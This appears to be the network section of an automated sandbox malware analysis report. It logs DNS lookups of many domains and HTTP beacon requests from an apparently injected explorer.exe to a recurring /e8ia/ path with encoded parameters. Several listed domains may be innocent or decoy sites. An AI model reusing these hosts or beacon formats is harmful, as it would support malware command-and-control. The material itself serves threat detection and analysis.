Nov 25, 2021 17:50:07.050507069 CET	80	49820	37.123.118.150	192.168.2.4
Nov 25, 2021 17:50:07.050673962 CET	49820	80	192.168.2.4	37.123.118.150
Nov 25, 2021 17:50:07.050757885 CET	49820	80	192.168.2.4	37.123.118.150
Nov 25, 2021 17:50:07.080266953 CET	80	49820	37.123.118.150	192.168.2.4
Nov 25, 2021 17:50:17.491674900 CET	49824	80	192.168.2.4	143.95.80.65
Nov 25, 2021 17:50:17.640175104 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.640367031 CET	49824	80	192.168.2.4	143.95.80.65
Nov 25, 2021 17:50:17.640515089 CET	49824	80	192.168.2.4	143.95.80.65
Nov 25, 2021 17:50:17.788731098 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792484999 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792517900 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792548895 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792577982 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792601109 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792625904 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792648077 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:17.792690992 CET	49824	80	192.168.2.4	143.95.80.65
Nov 25, 2021 17:50:17.792787075 CET	49824	80	192.168.2.4	143.95.80.65
Nov 25, 2021 17:50:17.792887926 CET	49824	80	192.168.2.4	143.95.80.65
Nov 25, 2021 17:50:17.941077948 CET	80	49824	143.95.80.65	192.168.2.4
Nov 25, 2021 17:50:22.868494987 CET	49833	80	192.168.2.4	185.65.236.168
Nov 25, 2021 17:50:25.873550892 CET	49833	80	192.168.2.4	185.65.236.168
Nov 25, 2021 17:50:31.890017033 CET	49833	80	192.168.2.4	185.65.236.168
Nov 25, 2021 17:50:44.637453079 CET	49848	80	192.168.2.4	185.65.236.168
Nov 25, 2021 17:50:47.641164064 CET	49848	80	192.168.2.4	185.65.236.168
Nov 25, 2021 17:50:53.657629013 CET	49848	80	192.168.2.4	185.65.236.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 17:49:30.427966118 CET	55854	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:49:30.530443907 CET	53	55854	8.8.8.8	192.168.2.4
Nov 25, 2021 17:49:40.561280966 CET	63153	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:49:40.645955086 CET	53	63153	8.8.8.8	192.168.2.4
Nov 25, 2021 17:49:45.893459082 CET	52991	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:49:45.931274891 CET	53	52991	8.8.8.8	192.168.2.4
Nov 25, 2021 17:49:50.999294996 CET	53700	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:49:51.086345911 CET	53	53700	8.8.8.8	192.168.2.4
Nov 25, 2021 17:49:56.159490108 CET	51726	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:49:56.369827032 CET	53	51726	8.8.8.8	192.168.2.4
Nov 25, 2021 17:50:01.505476952 CET	64801	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:50:01.580594063 CET	53	64801	8.8.8.8	192.168.2.4
Nov 25, 2021 17:50:06.924803972 CET	61522	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:50:06.989542961 CET	53	61522	8.8.8.8	192.168.2.4
Nov 25, 2021 17:50:17.329592943 CET	52337	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:50:17.490470886 CET	53	52337	8.8.8.8	192.168.2.4
Nov 25, 2021 17:50:22.799395084 CET	55046	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:50:22.867161989 CET	53	55046	8.8.8.8	192.168.2.4
Nov 25, 2021 17:50:44.591826916 CET	49612	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:50:44.630163908 CET	53	49612	8.8.8.8	192.168.2.4
Nov 25, 2021 17:50:48.923758030 CET	49285	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:50:49.302557945 CET	53	49285	8.8.8.8	192.168.2.4
Nov 25, 2021 17:50:56.143178940 CET	50601	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:50:56.192150116 CET	53	50601	8.8.8.8	192.168.2.4
Nov 25, 2021 17:51:01.299563885 CET	60875	53	192.168.2.4	8.8.8.8
Nov 25, 2021 17:51:01.443115950 CET	53	60875	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 17:49:30.427966118 CET	192.168.2.4	8.8.8.8	0x6f8e	Standard query (0)	www.mcclureic.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:40.561280966 CET	192.168.2.4	8.8.8.8	0xe637	Standard query (0)	www.yesrecompensas.lat	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:45.893459082 CET	192.168.2.4	8.8.8.8	0x968a	Standard query (0)	www.gadget198.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:50.999294996 CET	192.168.2.4	8.8.8.8	0x550f	Standard query (0)	www.le-hameau-enchanteur.com	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:56.159490108 CET	192.168.2.4	8.8.8.8	0x12e7	Standard query (0)	www.henleygirlscricket.com	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:01.505476952 CET	192.168.2.4	8.8.8.8	0x8c70	Standard query (0)	www.webartsolution.net	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:06.924803972 CET	192.168.2.4	8.8.8.8	0xe4c9	Standard query (0)	www.blttsperma.quest	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:17.329592943 CET	192.168.2.4	8.8.8.8	0x8757	Standard query (0)	www.intelldat.com	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:22.799395084 CET	192.168.2.4	8.8.8.8	0x8462	Standard query (0)	www.helpfromjames.com	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:44.591826916 CET	192.168.2.4	8.8.8.8	0xff5e	Standard query (0)	www.helpfromjames.com	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:48.923758030 CET	192.168.2.4	8.8.8.8	0xa78c	Standard query (0)	www.dandftrading.com	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:56.143178940 CET	192.168.2.4	8.8.8.8	0xb4d0	Standard query (0)	www.bestinvest-4-you.com	A (IP address)	IN (0x0001)
Nov 25, 2021 17:51:01.299563885 CET	192.168.2.4	8.8.8.8	0x51f4	Standard query (0)	www.weprepareamerica-planet.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 25, 2021 17:49:30.530443907 CET	8.8.8.8	192.168.2.4	0x6f8e	Server failure (2)	www.mcclureic.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:40.645955086 CET	8.8.8.8	192.168.2.4	0xe637	No error (0)	www.yesrecompensas.lat		3.96.23.237	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:45.931274891 CET	8.8.8.8	192.168.2.4	0x968a	No error (0)	www.gadget198.xyz		172.67.158.42	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:45.931274891 CET	8.8.8.8	192.168.2.4	0x968a	No error (0)	www.gadget198.xyz		104.21.8.250	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:51.086345911 CET	8.8.8.8	192.168.2.4	0x550f	No error (0)	www.le-hameau-enchanteur.com		213.186.33.5	A (IP address)	IN (0x0001)
Nov 25, 2021 17:49:56.369827032 CET	8.8.8.8	192.168.2.4	0x12e7	No error (0)	www.henleygirlscricket.com	w2y6q8s9.stackpathcdn.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 17:49:56.369827032 CET	8.8.8.8	192.168.2.4	0x12e7	No error (0)	w2y6q8s9.stackpathcdn.com		151.139.128.11	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:01.580594063 CET	8.8.8.8	192.168.2.4	0x8c70	No error (0)	www.webartsolution.net	webartsolution.net		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 17:50:01.580594063 CET	8.8.8.8	192.168.2.4	0x8c70	No error (0)	webartsolution.net		198.54.125.56	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:06.989542961 CET	8.8.8.8	192.168.2.4	0xe4c9	No error (0)	www.blttsperma.quest		37.123.118.150	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:17.490470886 CET	8.8.8.8	192.168.2.4	0x8757	No error (0)	www.intelldat.com	intelldat.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 17:50:17.490470886 CET	8.8.8.8	192.168.2.4	0x8757	No error (0)	intelldat.com		143.95.80.65	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:22.867161989 CET	8.8.8.8	192.168.2.4	0x8462	No error (0)	www.helpfromjames.com	helpfromjames.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 17:50:22.867161989 CET	8.8.8.8	192.168.2.4	0x8462	No error (0)	helpfromjames.com		185.65.236.168	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:44.630163908 CET	8.8.8.8	192.168.2.4	0xff5e	No error (0)	www.helpfromjames.com	helpfromjames.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 17:50:44.630163908 CET	8.8.8.8	192.168.2.4	0xff5e	No error (0)	helpfromjames.com		185.65.236.168	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:49.302557945 CET	8.8.8.8	192.168.2.4	0xa78c	No error (0)	www.dandftrading.com	wss.easycompanies.com.au		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 17:50:49.302557945 CET	8.8.8.8	192.168.2.4	0xa78c	No error (0)	wss.easycompanies.com.au		13.210.99.21	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:56.192150116 CET	8.8.8.8	192.168.2.4	0xb4d0	No error (0)	www.bestinvest-4-you.com		104.21.31.204	A (IP address)	IN (0x0001)
Nov 25, 2021 17:50:56.192150116 CET	8.8.8.8	192.168.2.4	0xb4d0	No error (0)	www.bestinvest-4-you.com		172.67.179.242	A (IP address)	IN (0x0001)
Nov 25, 2021 17:51:01.443115950 CET	8.8.8.8	192.168.2.4	0x51f4	No error (0)	www.weprepareamerica-planet.com		208.91.197.27	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.yesrecompensas.lat

www.gadget198.xyz

www.le-hameau-enchanteur.com

www.henleygirlscricket.com

www.webartsolution.net

www.blttsperma.quest

www.intelldat.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49781	3.96.23.237	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 17:49:40.756764889 CET	6722	OUT	GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1 Host: www.yesrecompensas.lat Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 17:49:40.862773895 CET	6722	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 25 Nov 2021 16:49:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 89 Connection: close X-date: 2021-11-23T23:37:01+00:00 Expires: Tue, 30 Nov 2021 23:37:01 +0000 Cache-Control: public, max-age=604800 Location: http://yesrecompensas.com.mx X-Xss-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Cached: HIT Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 79 65 73 72 65 63 6f 6d 70 65 6e 73 61 73 2e 63 6f 6d 2e 6d 78 27 22 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body onload="document.location.href='http://yesrecompensas.com.mx'"></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49783	172.67.158.42	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 17:49:45.949994087 CET	7577	OUT	GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1 Host: www.gadget198.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 17:49:45.980499029 CET	7578	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 25 Nov 2021 16:49:45 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Thu, 25 Nov 2021 17:49:45 GMT Location: https://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=693LmV%2Bw32mJLpz0CjLHpA9CmAqDZ3cBnMrgJPBsLZg3VlXc5o0F7BW0NUSneKFXoV86CV%2FB1SSCUpaP71S1BwtoQ1W6xgQpIeSLasN96ZbuxmIXWd023SoZO7OzNb6p00iwFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b3c5f464ee52488-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49784	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 17:49:51.119391918 CET	7579	OUT	GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1 Host: www.le-hameau-enchanteur.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 17:49:51.146656990 CET	7580	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Thu, 25 Nov 2021 16:49:51 GMT content-type: text/html content-length: 138 location: http://www.le-hameau-enchanteur.com x-iplb-request-id: 5411343F:C278_D5BA2105:0050_619FBEAF_1984DF61:1C785 x-iplb-instance: 16980 set-cookie: SERVERID77446=200173\|YZ++s\|YZ++s; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49785	151.139.128.11	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 17:49:56.399925947 CET	7581	OUT	GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1 Host: www.henleygirlscricket.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 17:49:56.444983959 CET	7582	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 16:49:56 GMT Cache-Control: no-store, no-cache, max-age=0, must-revalidate, private, max-stale=0, post-check=0, pre-check=0 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Set-Cookie: SPSI=f9ebd8c7b9ab11e4eabd2cfd107b74f6; path=/; HttpOnly; SameSite=Lax; Set-Cookie: SPSE=jB5wJrLCb5L3BCZV1tOG+b6YamHO2pIF5C6Yl5YG8SpYlBnGa8pQ668eabPu/dm7tdPEIiCzYkZ5CkO7l5whMA==; path=/; HttpOnly; SameSite=Lax; Set-Cookie: spcsrf=b9a5b2e19df40b785f85ce4477824e3c; path=/; SameSite=Strict; HttpOnly; expires=Thu, 25-Nov-21 18:49:56 GMT Set-Cookie: adOtr=obsvl; path=/; SameSite=Lax; expires=Thu, 2 Aug 2001 20:47:11 UTC Set-Cookie: UTGv2=D-h4a7d56b29c1428a99096986a481fb2c3e64; path=/; SameSite=Lax; expires=Tue, 24-May-22 16:49:56 GMT Server: fbs X-Accel-Expires: 0 X-HW: 1637858996.cds084.am5.h2,1637858996.cds007.am5.sc,1637858996.cdn2-wafbe02-ams1.stackpath.systems.-.w,1637858996.cds007.am5.p Access-Control-Allow-Origin: * Connection: close
Nov 25, 2021 17:49:56.445044041 CET	7583	IN	Data Raw: 31 66 33 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 Data Ascii: 1f3a<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>StackPath</title> <style>
Nov 25, 2021 17:49:56.445082903 CET	7584	IN	Data Raw: 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 20 4d 65 6e 6c 6f 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 6e 73 6f 6c 61 73 2c 20 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 20 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 20 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: Mono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;font-size: 0.875rem;}td:first-child{word-break: break-all;}form{margin-top: 3rem;text-align: center;}button, input{border-radius: 0.25rem;border: 0.0625rem soli
Nov 25, 2021 17:49:56.445122004 CET	7586	IN	Data Raw: 74 6c 65 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 52 6f 62 6f 74 6f 22 2c 20 22 4f 78 79 67 65 6e Data Ascii: tle);font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;font-size: 0.75rem;left: 0;position: absolute;text-transform: uppercase;top: 0;
Nov 25, 2021 17:49:56.445163012 CET	7587	IN	Data Raw: 2e 20 59 6f 75 20 77 69 6c 6c 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 6f 6e 63 65 20 74 68 65 20 76 61 6c 69 64 61 74 69 6f 6e 20 69 73 20 63 6f 6d 70 6c 65 74 65 2e 20 3c 2f 70 3e 20 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 Data Ascii: . You will be redirected once the validation is complete. </p> </div> <div class="layout__main" > <table> <thead> <tr> <th>Reference ID</th> <th>IP Address</th> <th>Date and Time</th> </tr> </thead> <tbody> <tr> <td data-title="Reference ID">6
Nov 25, 2021 17:49:56.445202112 CET	7589	IN	Data Raw: 74 72 69 6e 67 28 29 2b 22 3b 70 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 3b 22 3b 63 6f 6f 6b 69 65 65 6e 61 62 6c 65 64 3d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 69 6e 64 65 78 4f 66 28 22 73 62 74 73 63 6b 22 29 21 Data Ascii: tring()+";path=/; SameSite=Lax;";cookieenabled=(document.cookie.indexOf("sbtsck")!=-1)? true : false;}}if(cookieenabled){setTimeout("sbbloadmid()",50);}else{var oJSCookieMSGObj=document.getElementById('JSCookieMSG');var loadingContent=document
Nov 25, 2021 17:49:56.445242882 CET	7590	IN	Data Raw: 68 3d 66 75 6e 63 74 69 6f 6e 28 75 72 6c 2c 20 69 6e 69 74 29 7b 69 66 28 74 79 70 65 6f 66 28 75 72 6c 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 20 26 26 20 74 79 70 65 6f 66 28 75 72 6c 2e 75 72 6c 29 3d 3d 3d 22 73 74 72 69 6e 67 22 29 7b 69 6e 69 Data Ascii: h=function(url, init){if(typeof(url)==="object" && typeof(url.url)==="string"){init={method: url.method, mode: url.mode, cache: url.cache, credentials: url.credentials, headers: url.headers, body: url.body};url=url.url;}function sbbSd(url, dom
Nov 25, 2021 17:49:56.445282936 CET	7591	IN	Data Raw: 31 32 37 61 0d 0a 6e 20 61 64 64 70 72 69 64 28 70 72 69 64 29 7b 76 61 72 20 6f 6c 64 56 61 6c 3d 73 62 62 67 63 28 22 50 52 4c 53 54 22 29 3b 69 66 28 28 6f 6c 64 56 61 6c 2e 69 6e 64 65 78 4f 66 28 70 72 69 64 29 3d 3d 2d 31 29 26 26 28 6f 6c Data Ascii: 127an addprid(prid){var oldVal=sbbgc("PRLST");if((oldVal.indexOf(prid)==-1)&&(oldVal.split('/').length<5)){if(oldVal!=''){oldVal+='/';}document.cookie='PRLST='+oldVal+escape(prid)+';path=/; SameSite=Lax;';}}var sbbeccf=function(){this.sp3="j
Nov 25, 2021 17:49:56.445322037 CET	7593	IN	Data Raw: 65 3b 65 6c 73 65 7b 66 76 3d 67 6c 6f 62 61 6c 53 74 6f 72 61 67 65 5b 68 6f 73 74 5d 5b 6e 61 6d 65 5d 3b 69 66 28 74 79 70 65 6f 66 28 66 76 2e 74 6f 53 74 72 69 6e 67 29 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 66 76 3d 66 76 2e 74 6f 53 74 Data Ascii: e;else{fv=globalStorage[host][name];if(typeof(fv.toString)!="undefined")fv=fv.toString();}}catch(e){}}return fv;}, name:"sbbrf"};this.sfecls={f:function(name, value){var fv="";try{if(window.localStorage){if(typeof(value)!="undefined")localStor
Nov 25, 2021 17:49:56.445362091 CET	7594	IN	Data Raw: 3d 3d 22 22 29 66 76 3d 73 62 62 67 63 28 22 55 54 47 76 32 22 29 3b 66 76 3d 74 68 69 73 2e 73 62 62 63 76 28 66 76 29 3b 69 66 28 66 76 21 3d 22 22 29 74 68 69 73 2e 73 62 62 73 76 28 66 76 29 3b 65 6c 73 65 20 74 68 69 73 2e 73 62 62 73 76 28 Data Ascii: =="")fv=sbbgc("UTGv2");fv=this.sbbcv(fv);if(fv!="")this.sbbsv(fv);else this.sbbsv("D-h4a7d56b29c1428a99096986a481fb2c3e64");return fv;};};function m2vr(m1,m2){var i=0;var rc="";var est="ghijklmnopqrstuvwyz";var rnum;var rpl;var charm1=m1.charA
Nov 25, 2021 17:49:56.445394993 CET	7595	IN	Data Raw: 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 20 26 26 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 21 3d 38 30 20 3f 20 27 3a 27 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 Data Ascii: ion.hostname+(window.location.port && window.location.port!=80 ? ':'+window.location.port: '')+'/sbbi/?sbbpg=sbbShell&gprid='+prid + '&sbbgs='+sbbgs+'&ddl='+(Math.round(dfx.getTime()/1000)-1637858996)+'';var sbbDiv=document.getElementById('sbb

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49798	198.54.125.56	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 17:50:01.748836994 CET	7906	OUT	GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1 Host: www.webartsolution.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 17:50:01.915517092 CET	7909	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Thu, 25 Nov 2021 16:50:01 GMT server: LiteSpeed location: https://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

